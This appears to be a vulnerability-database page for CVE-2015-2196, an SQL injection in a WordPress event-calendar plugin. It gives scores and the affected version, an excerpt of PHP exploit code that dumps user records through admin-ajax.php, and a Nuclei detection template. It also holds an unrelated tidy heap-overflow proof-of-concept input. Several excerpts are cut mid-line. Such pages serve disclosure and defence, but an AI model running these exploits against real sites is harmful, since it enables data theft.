CVE-2015-2196
published 2015-03-03CVE-2015-2196: SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in…
PriorityP354high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
11.18%
95.4th percentile
SQL injection vulnerability in Spider Event Calendar 1.4.9 for WordPress allows remote attackers to execute arbitrary SQL commands via the cat_id parameter in a spiderbigcalendar_month action to wp-admin/admin-ajax.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| web-dorado | spider_calendar | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection
exploitdb·2015-02-13
CVE-2015-2196 WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection
WordPress Plugin Webdorado Spider Event Calendar 1.4.9 - SQL Injection
---
.
# Exploit Title: WordPress: Webdorado Spider Event Calendar ';
$fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
$usersCurl = curl_init($fullURL);
curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($usersCurl);
if (stripos($result, PATTERN_TO_SEARCH) !== false)
{
$from = stripos($result, PATTERN_TO_SEARCH_USERS);
$to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
$result = substr($result, $from, $to-$from);
echo ''.str_replace(FIELD_SEPARATOR, '', str_replace(ROW_SEPARATOR, '', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'';
}
else
{
echo 'Table name fetched, but not users - try to rewrite exploit :-(';
}
Nuclei
WordPress Spider Calendar <=1.4.9 - SQL Injection
nuclei·CVSS 7.5
CVE-2015-2196 [HIGH] WordPress Spider Calendar <=1.4.9 - SQL Injection
WordPress Spider Calendar =6'
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition: and
# digest: 4a0a004730450220096e1924a7f497978ec7f0f7eca24d9d64196deb75b63abb4bb54b2fd3b547930221008f57993def8a9b8dc030ecc3c342bad55b33a856ccd2f95efa70820d441fb2db:922c64590222798bb761d5b6d8e72950
Greynoiseio
NoiseLetter October 2025
blogs_greynoiseio
NoiseLetter October 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2015-5522 CVE-2015-5523 tidy: heap buffer overflow in ParseValue()
bugzilla·2015-06-04·CVSS 6.8
CVE-2015-5522 [MEDIUM] CVE-2015-5522 CVE-2015-5523 tidy: heap buffer overflow in ParseValue()
CVE-2015-5522 CVE-2015-5523 tidy: heap buffer overflow in ParseValue()
Heap buffer overflow was reported in Tidy.
This issue could be abused on server side applications that use php-tidy extension with user input.
Part of original report:
"""
POC
$ printf "\x3c\x61\x20\x62\x3d\x3c\x61\x20\x3c\x3f\x78\x6d
\x0d\x3f\x3e\x62\x3d\x22\x63\x22\x47\x20\x68\x72\x65
\x66\x3d\x22\x12\x22\xbb" > err.html
An asan-enabled build of tidy outputs:
$ tidy-asan err.html
==2196==ERROR: AddressSanitizer: heap-buffer-overflow on address
0xb53006b1 at pc 0xb71df8fe bp 0xbfac9928 sp 0xbfac9918
WRITE of size 1 at 0xb53006b1 thread T0
#0 0xb71df8fd in prvTidytmbstrndup (/usr/lib/libtidy-0.99.so.0+0x15c8fd)
#1 0xb7141060 in prvTidyGetToken (/usr/lib/libtidy-0.99.so.0+0xbe060)
#2 0xb711856e in prvTidyParseDocumen
2015-03-03
Published